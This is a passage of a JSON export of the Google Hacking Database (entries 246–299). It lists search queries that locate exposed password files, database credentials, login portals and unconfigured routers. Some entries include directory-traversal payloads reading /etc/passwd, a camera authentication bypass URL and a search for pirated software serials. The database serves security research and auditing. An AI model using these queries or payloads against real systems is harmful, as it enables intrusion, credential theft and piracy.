"signatureReferenceNumber": "246", "link": "https://www.exploit-db.com/ghdb/246/", "category": "Footholds", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%2Bhtpasswd+%2BWS_FTP.LOG+filetyp", "shortDescription": "+htpasswd +WS_FTP.LOG filetype:log", "textualDescription": "WS_FTP.LOG can be used in many ways to find more information about a server. This query is very flexible, just substitute \"+htpasswd\" for \"+FILENAME\" and you may get several hits that you hadn't seen with the 'normal' search. Filenames suggested by the forum to explore are: phpinfo, admin, MySQL, password, htdocs, root, Cisco, Oracle, IIS, resume, inc, sql, users, mdb, frontpage, CMS, backend, https, editor, intranet . The list goes on and on..A different approach might be \"allinurl: \"some.host.com\" WS_FTP.LOG filetype:log\" which tells you more about who's uploading files to a specific site." }, { "signatureReferenceNumber": "247", "link": "https://www.exploit-db.com/ghdb/247/", "category": "Error Messages", "querystring": "http://www.google.com/search?num=100&q=%22error+found+handling+the+request%22+cocoon+filetype%3Axml", "shortDescription": "\"error found handling the request\" cocoon filetype:xml", "textualDescription": "Cocoon is an XML publishing framework. It allows you to define XML documents and transformations to be applied on it, to eventually generate a presentation format of your choice (HTML, PDF, SVG). For more information read http://cocoon.apache.org/2.1/overview.htmlThis Cocoon error displays library functions, cocoon version number, and full and/or relative path names." }, { "signatureReferenceNumber": "248", "link": "https://www.exploit-db.com/ghdb/248/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Big+Sister%22+%2B%22OK+Attention+Trouble%22&btnG=Search", "shortDescription": "intitle:\"Big Sister\" +\"OK Attention Trouble\"", "textualDescription": "This search reveals Internal network status information about services and hosts." }, { "signatureReferenceNumber": "249", "link": "https://www.exploit-db.com/ghdb/249/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%22%2Fcricket%2Fgrapher.cgi%22&btnG=Search", "shortDescription": "inurl:\"/cricket/grapher.cgi\"", "textualDescription": "This search reveals information about internal networks, such as configuration, services, bandwidth." }, { "signatureReferenceNumber": "250", "link": "https://www.exploit-db.com/ghdb/250/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%22cacti%22+%2Binurl%3A%22graph_view.php%22+%2B%22Settings+Tree+View%22+-cvs+-RPM&btnG=Search", "shortDescription": "inurl:\"cacti\" +inurl:\"graph_view.php\" +\"Settings Tree View\" -cvs -RPM", "textualDescription": "This search reveals internal network info including architecture, hosts and services available." }, { "signatureReferenceNumber": "251", "link": "https://www.exploit-db.com/ghdb/251/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22System+Statistics%22+%2B%22System+and+Network+Information+Center%22&btnG=Search", "shortDescription": "intitle:\"System Statistics\" +\"System and Network Information Center\"", "textualDescription": "This search reveals internal network information including network configuratino, ping times, services, and host info." }, { "signatureReferenceNumber": "252", "link": "https://www.exploit-db.com/ghdb/252/", "category": "Files containing passwords", "querystring": "http://www.google.de/search?hl=de&ie=UTF-8&q=inurl%3A%22wvdial.conf%22+intext%3A%22password%22&btnG=Suche&meta=", "shortDescription": "inurl:\"wvdial.conf\" intext:\"password\"", "textualDescription": "The wvdial.conf is used for dialup connections.it contains phone numbers, usernames and passwords in cleartext." }, { "signatureReferenceNumber": "253", "link": "https://www.exploit-db.com/ghdb/253/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Ainc+dbconn", "shortDescription": "filetype:inc dbconn", "textualDescription": "This file contains the username and password the website uses to connect to the db. Lots of these Google results don't take you straight to 'dbconn.inc', instead they show you an error message -- that shows you exactly where to find dbconn.inc!!" }, { "signatureReferenceNumber": "254", "link": "https://www.exploit-db.com/ghdb/254/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%22slapd.conf%22+intext%3A%22credentials%22+-manpage+-%22Manual+Page%22+-man%3A+-sample&btnG=Search", "shortDescription": "inurl:\"slapd.conf\" intext:\"credentials\" -manpage -\"Manual Page\" -man: -sample", "textualDescription": "slapd.conf is the configuration file for slapd, the opensource LDAP deamon. The key \"credentinals\" contains passwords in cleartext." }, { "signatureReferenceNumber": "255", "link": "https://www.exploit-db.com/ghdb/255/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%22slapd.conf%22+intext%3A%22rootpw%22++-manpage+-%22Manual+Page%22+-man%3A+-sample&btnG=Search", "shortDescription": "inurl:\"slapd.conf\" intext:\"rootpw\" -manpage -\"Manual Page\" -man: -sample", "textualDescription": "slapd.conf is the configuration file for slapd, the opensource LDAP deamon. You can view a cleartext or crypted password for the \"rootdn\"." }, { "signatureReferenceNumber": "256", "link": "https://www.exploit-db.com/ghdb/256/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aini+%2Bws_ftp+%2Bpwd&btnG=Search", "shortDescription": "filetype:ini ws_ftp pwd", "textualDescription": "The encryption method used in WS_FTP is _extremely_ weak. These files can be found with the \"index of\" keyword or by searching directly for the PWD= value inside the configuration file." }, { "signatureReferenceNumber": "257", "link": "https://www.exploit-db.com/ghdb/257/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Aforward+filetype%3Aforward+-cvs&btnG=Search", "shortDescription": "inurl:forward filetype:forward -cvs", "textualDescription": "Users on *nix boxes can forward their mail by placing a .forward file in their home directory. These files reveal email addresses." }, { "signatureReferenceNumber": "258", "link": "https://www.exploit-db.com/ghdb/258/", "category": "Error Messages", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Invision+Power+Board+Database+Error%22&btnG=Search", "shortDescription": "\"Invision Power Board Database Error\"", "textualDescription": "These are SQL error messages, ranging from to many connections, access denied to user xxx, showing full path info to the php files etc.. There is an exploitable bug in version 1.1 of this software and the current version is 1.3 available for download on the site." }, { "signatureReferenceNumber": "259", "link": "https://www.exploit-db.com/ghdb/259/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Anetrc+password&btnG=Search", "shortDescription": "filetype:netrc password", "textualDescription": "The .netrc file is used for automatic login to servers. The passwords are stored in cleartext." }, { "signatureReferenceNumber": "260", "link": "https://www.exploit-db.com/ghdb/260/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=signin+filetype%3Aurl&btnG=Search", "shortDescription": "signin filetype:url", "textualDescription": "Javascript for user validation is a bad idea as it shows cleartext user/pass combos. There is one googledork who forgot that." }, { "signatureReferenceNumber": "261", "link": "https://www.exploit-db.com/ghdb/261/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Adat+wand.dat&btnG=Search", "shortDescription": "filetype:dat wand.dat", "textualDescription": "The world-famous web-browser Opera has the ability to save the password for you, and it call the system \"Magic Wand\". When on a site, you can save the username and password to the magic wand, then on the site again, click the magic wand icon and it will fill it out automaticly for you. What a joy! Opera saves this file on you'r computer, it is located (on winXP) here: D:\\Documents and Settings\\Peefy\\Programdata\\Opera\\Opera75\\profile\\wand.dat for me offcourse, change it so its suitable for you..But, if you don't have a descrambler or whatever, the passwords arent cleartext, but you have to put the wand file in the location specified above, then open opera, click tools, Wand Passwords, then see the URL's saved, then go to theese URL's and click the wand button." }, { "signatureReferenceNumber": "262", "link": "https://www.exploit-db.com/ghdb/262/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=%22Index+Of+%2Fnetwork%22+%22last+modified", "shortDescription": "\"Index Of /network\" \"last modified\"", "textualDescription": "Many of these directories contain information about the network, though an attacker would need a considerable amount of patience to find it." }, { "signatureReferenceNumber": "263", "link": "https://www.exploit-db.com/ghdb/263/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%2Feprise%2F+&btnG=Search", "shortDescription": "inurl:/eprise/", "textualDescription": "silkRoad Eprise is a dynamic content management product that simplifies the flow of content to a corporate website. The software requires NT 4, Windows 2000 or Solaris and is used by high-profile corporations. If an attacker cuts the url after the eprise/ directory, he is presented with the admin logon screen." }, { "signatureReferenceNumber": "264", "link": "https://www.exploit-db.com/ghdb/264/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22album+permissions%22+%22Users+who+can+modify+photos%22+%22EVERYBODY%22&btnG=Search", "shortDescription": "intitle:\"album permissions\" \"Users who can modify photos\" \"EVERYBODY\"", "textualDescription": "Gallery (http://gallery.menalto.com) is software that allows users to create webalbums and upload pictures to it. In some installations Gallery lets you access the Admin permission page album_permissions.php without authentication. Even if not \"everybody\" has modify rights, an attacker can do a search for \"users who can see the album\" to retrieve valid usernames for the gallery." }, { "signatureReferenceNumber": "265", "link": "https://www.exploit-db.com/ghdb/265/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Acfg+mrtg+%22target%5B*%5D%22+-sample+-cvs+-example&btnG=Search", "shortDescription": "filetype:cfg mrtg \"target[*]\" -sample -cvs -example", "textualDescription": "Mrtg.cfg is the configuration file for polling SNMP enabled devices. The community string (often 'public') is found in the line starting with target:#Target[test]: 1.3.6.1.4.1.2021.10.1.5.1&1.3.6.1.4.1.2021.10.1.5.2:public@localhostRemember not all targets are SNMP devices. Users can monitor CPU info for example." }, { "signatureReferenceNumber": "266", "link": "https://www.exploit-db.com/ghdb/266/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Aldb+admin&btnG=Google+Search", "shortDescription": "filetype:ldb admin", "textualDescription": "According to filext.com, the ldb file is \"A lock file is used to keep muti-user databases from being changed in the same place by two people at the same time resulting in data corruption.\" These Access lock files contain the username of the last user and they ALWAYS have the same filename and location as the database. Attackers can substitute mdb for ldb and dowload the database file." }, { "signatureReferenceNumber": "267", "link": "https://www.exploit-db.com/ghdb/267/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Ainstall.php+intitle%3AphpMySearch&btnG=Search", "shortDescription": "inurl:search/admin.php", "textualDescription": "phpMySearch is a personal search engine that one can use to provide a search feature for one's own Web site. With this search an attacker can find admin logon screens. This software does not seem to be very popular yet, but would allow attackers to access indexed information about the host if compromised." }, { "signatureReferenceNumber": "268", "link": "https://www.exploit-db.com/ghdb/268/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Ar2w+r2w&btnG=Search", "shortDescription": "filetype:r2w r2w", "textualDescription": "WRQ Reflection gives you a standard desktop that includes web- and Windows-based terminal emulation and X Windows products. Terminal emulation settings are saved to a configuration file, depending on the version called r1w, r2w, or r4w. If an attacker loads these files he can access the main login screen on mainframe systems for example." }, { "signatureReferenceNumber": "269", "link": "https://www.exploit-db.com/ghdb/269/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aphp+inurl%3AvAuthenticate&btnG=Search", "shortDescription": "filetype:php inurl:vAuthenticate", "textualDescription": "vAuthenticate is a multi-platform compatible PHP and MySQL script which allows creation of new user accounts new user groups, activate/inactivate groups or individual accounts, set user level, etc. There are two admin users by default with an easy to guess password. The backup admin user can *not* be deleted. There is also a test account with the same password that can not be deleted.An attacker can find the default passwords by downloading the software and browsing the .sql files. Default passwords are seldom changed if the user is not *forced* to change them first before using the sofware. This software doesn't enforce such a rule." }, { "signatureReferenceNumber": "270", "link": "https://www.exploit-db.com/ghdb/270/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22ZyXEL+Prestige+Router%22+%22Enter+password%22+", "shortDescription": "intitle:\"ZyXEL Prestige Router\" \"Enter password\"", "textualDescription": "This is the main authentication screen for the ZyXEL Prestige Router." }, { "signatureReferenceNumber": "271", "link": "https://www.exploit-db.com/ghdb/271/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Welcome+to+the+Prestige+Web-Based+Configurator%22+", "shortDescription": "\"Welcome to the Prestige Web-Based Configurator\"", "textualDescription": "This is the configuration screen for a Prestige router. This page indicates that the router has not yet been setup and any web user can make changes to the router." }, { "signatureReferenceNumber": "272", "link": "https://www.exploit-db.com/ghdb/272/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22ADSL+Configuration+page%22", "shortDescription": "intitle:\"ADSL Configuration page\"", "textualDescription": "This is the status screen for the Solwise ADSL modem. Information available from this page includes IP addresses, MAC addresses, subnet mask, firware version of the modem. Attackers can use this information to formulate an attack." }, { "signatureReferenceNumber": "273", "link": "https://www.exploit-db.com/ghdb/273/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22Version+Info%22+%22Boot+Version%22+%22Internet+Settings%22", "shortDescription": "\"Version Info\" \"Boot Version\" \"Internet Settings\"", "textualDescription": "This is the status page for a Belkin Cable/DSL gateway. Information can be retrieved from this page including IP addresses, WAN addresses, MAC addresses, firmware versions, serial numbers, subnet masks, firewall settings, encryption settings, NAT settings and SSID. Attackers can use this information to formulate an attack." }, { "signatureReferenceNumber": "274", "link": "https://www.exploit-db.com/ghdb/274/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Asql+%2B%22IDENTIFIED+BY%22+-cvs&btnG=Search", "shortDescription": "filetype:sql +\"IDENTIFIED BY\" -cvs", "textualDescription": "Database maintenance is often automated by use of .sql files wich may contain many lines of batched SQL commands. These files are often used to create databases and set or alter permissions. The passwords used can be either encrypted or even plaintext.An attacker can use these files to acquire database permissions that normally would not be given to the masses." }, { "signatureReferenceNumber": "275", "link": "https://www.exploit-db.com/ghdb/275/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Asql+password&btnG=Search", "shortDescription": "filetype:sql password", "textualDescription": "Database maintenance is often automated by use of .sql files that contain many lines of batched SQL commands. These files are often used to create databases and set or alter permissions. The passwords used can be either encrypted or even plaintext.An attacker can use these files to acquire database permissions that normally would not be given to the masses." }, { "signatureReferenceNumber": "276", "link": "https://www.exploit-db.com/ghdb/276/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Welcome+Site%2FUser+Administrator%22+%22Please+select+the+language%22+-demos&btnG=Search", "shortDescription": "intitle:\"Welcome Site/User Administrator\" \"Please select the language\" -demos", "textualDescription": "service providers worldwide use Ensim's products to automate the management of their hosting services. Currently it hosts more than 500,000 Web sites and five million mailboxes.Ensim's uses a control panel GUI to manage the servers. It has four levels of priviledges. The software runs on TCP port 19638, but access is normally limited to trusted hosts only. A local exploit was found by badc0ded.org in virthostmail, part of Ensim WEBppliance Pro." }, { "signatureReferenceNumber": "277", "link": "https://www.exploit-db.com/ghdb/277/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Apwd+service&btnG=Search", "shortDescription": "filetype:pwd service", "textualDescription": "Microsoft Frontpage extensions appear on virtually every type of scanner. In the late 90's people thought they where hardcore by defacing sites with Frontpage. Today, there are still vulnerable servers found with Google. An attacker can simply take advantage from administrators who 'forget' to set up the policies for Frontpage extensions. An attacker can also search for 'filetype:pwd users'." }, { "signatureReferenceNumber": "278", "link": "https://www.exploit-db.com/ghdb/278/", "category": "Pages containing login portals", "querystring": "http://www.google.co.uk/search?hl=en&ie=UTF-8&q=%22ttawlogin.cgi%2F%3Faction%3D%22&btnG=Search&meta=", "shortDescription": "\"ttawlogin.cgi/?action=\"", "textualDescription": "Tarantella is a family of enterprise-class secure remote access software products. This Google-dork lists the login page for remote access to either the site server or another server within the target company. Tarantella also has a few security issues for a list of possible things that a malicous user could try to do, have a look at - http://www.tarantella.com/security/index.html An example of a malicous user could try is http://www.tarantella.com/security/bulletin-03.html the exploit isn't included in the User-Notice, but I've worked it out to be something like install directory/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd" }, { "signatureReferenceNumber": "279", "link": "https://www.exploit-db.com/ghdb/279/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=inurl%3AindexFrame.shtml+Axis&btnG=Google+Search", "shortDescription": "Axis Network Cameras", "textualDescription": "The AXIS 2400 is a Web server of its own. This means that the server is secured like any other Internet host. It is up to the network manager to restrict access to the AXIS Web Cameras camera server. AXIS Network cams have a cam control page called indexFrame.shtml wich can easily be found by searching Google. An attacker can look for the ADMIN button and try the default passwords found in the documentation. An attacker may also find that the directories are browsable. Additional security related information was found on the Internet.Securityfocus(www.securityfocus.com):----------------------------------------------------\"It has been reported that the Axis Video Servers do not properly handle input to the 'command.cgi' script. Because of this, an attacker may be able to create arbitrary files that would result in a denial of service, or potentially command execution.\" Core Security Technologies Advisory (http://www.coresecurity.com):---------------------------------------------------\"We have discovered the following security vulnerability: by accessing http://camera-ip//admin/admin.shtml (notice the double slash) the authentication for \"admin\" is bypassed and an attacker gains direct access to the configuration." }, { "signatureReferenceNumber": "280", "link": "https://www.exploit-db.com/ghdb/280/", "category": "Sensitive Online Shopping Info", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=POWERED+BY+HIT+JAMMER+1.0%21&btnG=Google+Search", "shortDescription": "POWERED BY HIT JAMMER 1.0!", "textualDescription": "Hit Jammer is a Unix compatible script that allows you to manage the content and traffic exchange and make web changes, all without needing HTML. It is typicaly used by the underground sites on the Net who \"pay for surfing ads\" and advertise spam services or software.An attacker can find these sites by searching for the typical \"powered by hit jammer !\" frase on the bottom of the main page. Then if he changes the URL to www.target.com/admin/admin.php he is taken to the admin panel. Hit Jammer administrators are warned to protect this page with the .htaccess logon procedure, but many fail to do just that. In such cases, customer information like email addresses and passwords are in clear view of the attacker. Since human beings often use one simple password for many things this is a very dangerous practice." }, { "signatureReferenceNumber": "281", "link": "https://www.exploit-db.com/ghdb/281/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=94FBR+%22ADOBE+PHOTOSHOP%22&btnG=Search", "shortDescription": "94FBR \"ADOBE PHOTOSHOP\"", "textualDescription": "94FBR is part of many serials. An malicious user would only have to change the programm name (photoshop in this example) in this search to find a perfectly valid serial.Other values to look for are: GC6J3. GTQ62. FP876. D3DX8." }, { "signatureReferenceNumber": "282", "link": "https://www.exploit-db.com/ghdb/282/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=inurl%3Azebra.conf+intext%3Apassword+-sample+-test+-tutorial+-download&btnG=Google+Search", "shortDescription": "inurl:zebra.conf intext:password -sample -test -tutorial -download", "textualDescription": "GNU Zebra is free software that manages TCP/IP based routing protocols. It supports BGP-4 protocol as well as RIPv1, RIPv2 and OSPFv2.The zebra.conf uses the same format as the cisco config files. There is an enable password (plain text or encrypted) and ipv6 tunnel definitions, hostnames, ethernet interface names, ip routing information, etc." }, { "signatureReferenceNumber": "283", "link": "https://www.exploit-db.com/ghdb/283/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Aospfd.conf+intext%3Apassword+-sample+-test+-tutorial+-download&btnG=Search", "shortDescription": "inurl:ospfd.conf intext:password -sample -test -tutorial -download", "textualDescription": "GNU Zebra is free software that manages TCP/IP based routing protocols. It supports BGP-4 protocol as well as RIPv1, RIPv2 and OSPFv2.The ospfd.conf uses the same format as the cisco config files. There is an enable password (plain text or encrypted) and ipv6 tunnel definitions, hostnames, ethernet interface names, ip routing information, etc." }, { "signatureReferenceNumber": "284", "link": "https://www.exploit-db.com/ghdb/284/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Index+of+%2F%22+modified+php.exe&btnG=Search", "shortDescription": "intitle:\"Index of /\" modified php.exe", "textualDescription": "PHP installed as a cgi-bin on a Windows Apache server will allow an attacker to view arbitrary files on the hard disk, for example by requesting \"/php/php.exe?c:\\boot.ini.\"" }, { "signatureReferenceNumber": "285", "link": "https://www.exploit-db.com/ghdb/285/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Alog+inurl%3Accbill", "shortDescription": "inurl:ccbill filetype:log", "textualDescription": "CCBill.com sells E-tickets to online entertainment and subscription-based websites. CCBill.com gives consumers access to the hottest entertainment sites on the World Wide Web. The word \"hot\" in this context seems apropriate when considering the type of sites that use e-tickets :)CCBill log files contain usernames and password information, but are protected with DES encryption. An attacker can crack these using the information provided on this site: http://www.jaddo.net/forums/index.php?&act=ST&f=19&t=4242." }, { "signatureReferenceNumber": "286", "link": "https://www.exploit-db.com/ghdb/286/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Amdb+inurl%3Ausers.mdb&btnG=Google+Search", "shortDescription": "filetype:mdb inurl:users.mdb", "textualDescription": "Everyone has this problem, we need to remember many passwords to access the resources we use. Some believe it is a good solution to use Microsoft Access as a password database..An attacker can find and download those mdb files easily with Google. This search tries to find such \"user\" databases. Some are password protected, many are not. Weee!" }, { "signatureReferenceNumber": "287", "link": "https://www.exploit-db.com/ghdb/287/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=intitle:%22Error+using+Hypernews%22+%22Server+Software%22&num=100&hl=en&lr=&ie=UTF-8&safe=off&filter=0", "shortDescription": "intitle:\"Error using Hypernews\" \"Server Software\"", "textualDescription": "HyperNews is a cross between the WWW and Usenet News. Readers can browse through the messages written by other people and reply to those messages. This search reveals the server software, server os, server account user:group (unix), and the server administrator email address. Many of these messages also include a traceback of the files and linenumbers and a listing of the cgi ENV variables. An attacker can use this information to prepare an attack either on the platform or the script files." }, { "signatureReferenceNumber": "288", "link": "https://www.exploit-db.com/ghdb/288/", "category": "Sensitive Directories", "querystring": "http://www.google.de/search?hl=de&ie=ISO-8859-1&q=filetype%3Acfg+ks+intext%3Arootpw+-sample+-test+-howto&meta=", "shortDescription": "filetype:cfg ks intext:rootpw -sample -test -howto", "textualDescription": "Anaconda is a linux configuration tool like yast on suse linux. The root password is often encrypted - like md5 or read from the shadow. Sometimes an attacker can also get a cleartext password.There are more ks configs then you might expect and with a bit of searching through the result list an attacker can find the root password and own that system." }, { "signatureReferenceNumber": "289", "link": "https://www.exploit-db.com/ghdb/289/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Aphp+inurl%3A%22viewfile%22+-%22index.php%22+-%22idfil&btnG=Google+Search", "shortDescription": "filetype:php inurl:\"viewfile\" -\"index.php\" -\"idfil", "textualDescription": "Programmers do strange things sometimes and forget about security. This search is the perfect example. These php scripts are written for viewing files in the web directory (e.g. ww.XXX.com/viewfile.php?my_howto.txt --> will show you the my_howto.txt).An attacker can check for buggy php scripts wich allow you to view any file on the system (with webservers permissions). Try the good, old directory traversal trick: \"../../../\". You have to know the filename and location, but that's not a big problem (/etc/passwd anyone ?)." }, { "signatureReferenceNumber": "290", "link": "https://www.exploit-db.com/ghdb/290/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=active&q=allinurl%3A%22.nsconfig%22+-sa", "shortDescription": "allinurl:\".nsconfig\" -sample -howto -tutorial", "textualDescription": "Access to a Web server's content, CGI scripts, and configuration files is controlled by entries in an access file. On Apache and NCSA Web servers the file is .htaccess, on Netscape servers it is .nsconfig.These files associate users, groups, and IP addresses with various levels of permissions: GET (read), POST (execute), PUT (write), and DELETE. For example, a FrontPage author would have permission to use HTTP POST commands (to save new content), and a user with browse permissions would be permitted to use HTTP GET commands (to read content)." }, { "signatureReferenceNumber": "291", "link": "https://www.exploit-db.com/ghdb/291/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=active&q=inurl%3A%22exchange%2Flogon.asp%22+OR+intitle%3A%22Microsoft+Outlook+Web+Access+-+Logon%22&btnG=Search", "shortDescription": "Outlook Web Access (a better way)", "textualDescription": "According to Microsoft \"Microsoft (R) Outlook (TM) Web Access is a Microsoft Exchange Active Server Application that gives you private access to your Microsoft Outlook or Microsoft Exchange personal e-mail account so that you can view your Inbox from any Web Browser. It also allows you to view Exchange server public folders and the Address Book from the World Wide Web. Anyone can post messages anonymously to public folders or search for users in the Address Book. \" Now, consider for a moment and you will understand why this could be potentially bad." }, { "signatureReferenceNumber": "292", "link": "https://www.exploit-db.com/ghdb/292/", "category": "Files containing usernames", "querystring": "http://www.google.com/search?q=inurl:root.asp%3Facs%3Danon&num=100&hl=en&lr=&ie=UTF-8&safe=off&output=search", "shortDescription": "OWA Public folders & Address book", "textualDescription": "This search jumps right to the main page of Outlook Web Access Public Folders and the Exchange Address Book:.An attacker can use the addressbook to enumerate usernames anonymously without having to logon. These usernames can then be used to guess the mailbox passwords. An attacker can also browse the public folders to gather extra information about the organisation." }, { "signatureReferenceNumber": "293", "link": "https://www.exploit-db.com/ghdb/293/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Looking+Glass%22+%28inurl%3A%22lg%2F%22+%7C+inurl%3Alookingglass%29+&btnG=Search", "shortDescription": "Looking Glass", "textualDescription": "A Looking Glass is a CGI script for viewing results of simple queries executed on remote routers. There are many Looking Glass sites all over the world. Some are password protected, many are not.An attacker use this to gather information about the network." }, { "signatureReferenceNumber": "294", "link": "https://www.exploit-db.com/ghdb/294/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Acgi+inurl%3A%22irc.cgi%22+%7C+intitle%3A%22CGI%3AIRC+Login%22+&btnG=Google+Search", "shortDescription": "CGI:IRC Login", "textualDescription": "CGIIRC is a web-based IRC client. Using a non-transparent proxy an attacker could communicate anonymously by sending direct messages to a contact. Most servers are restricted to one irc server and one or more default channels and will not let allow access to anything else." }, { "signatureReferenceNumber": "295", "link": "https://www.exploit-db.com/ghdb/295/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Actt+ctt+messenger&btnG=Search", "shortDescription": "filetype:ctt ctt messenger", "textualDescription": "MSN Messenger uses the file extension *.ctt when you export the contact list. An attacker could use this for social enginering tricks." }, { "signatureReferenceNumber": "296", "link": "https://www.exploit-db.com/ghdb/296/", "category": "Error Messages", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Error+Occurred+While+Processing+Request%22+%2BWHERE+%28SELECT%7CINSERT%29+filetype%3Acfm&btnG=Search", "shortDescription": "intitle:\"Error Occurred While Processing Request\" +WHERE (SELECT|INSERT) filetype:cfm", "textualDescription": "Cold fusion error messages logging the SQL SELECT or INSERT statements and the location of the .cfm file on the webserver.An attacker could use this information to quickly find SQL injection points." }, { "signatureReferenceNumber": "297", "link": "https://www.exploit-db.com/ghdb/297/", "category": "Error Messages", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22htsearch+error%22+ht%3A%2F%2FDig+error&btnG=Search", "shortDescription": "ht://Dig htsearch error", "textualDescription": "The ht://Dig system is a complete world wide web indexing and searching system for a domain or intranet. A list of publically available sites that use ht://Dig is available at http://www.htdig.org/uses.htmlht://Dig 3.1.1 - 3.2 has a directory traversal and file view vulnerability as described at http://www.securityfocus.com/bid/1026. Attackers can read arbitrary files on the system. If the system is not vulnerable, attackers can still use the error produced by this search to gather information such as administrative email, validation of a cgi-bin executable directory, directory structure, location of a search database file and possible naming conventions." }, { "signatureReferenceNumber": "298", "link": "https://www.exploit-db.com/ghdb/298/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Aasp+inurl%3A%22shopdisplayproducts.asp%22&btnG=Google+Search", "shortDescription": "VP-ASP Shopping Cart XSS", "textualDescription": "VP-ASP (Virtual Programming - ASP) has won awards both in the US and France. It is now in use in over 70 countries. VP-ASP can be used to build any type of Internet shop and sell anything.According to http://www.securityfocus.com/bid/9164/discussion/ a vulnerability has been reported to exist in VP-ASP software that may allow a remote user to launch cross-site scripting attacks. A remote attacker may exploit this issue to potentially execute HTML or script code in the security context of the vulnerable site.The vendor has released fixes to address this issue. It is reported that the fixes are applied to VP-ASP 5.0 as of February 2004. An attacker could also search Google for intitle:\"VP-ASP Shopping Cart *\" -\"5.0\" to find unpatched servers." }, { "signatureReferenceNumber": "299", "link": "https://www.exploit-db.com/ghdb/299/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aconf+inurl%3Aunrealircd.conf+-cvs+-gentoo&btnG=Search", "shortDescription": "Unreal IRCd", "textualDescription": "Development of 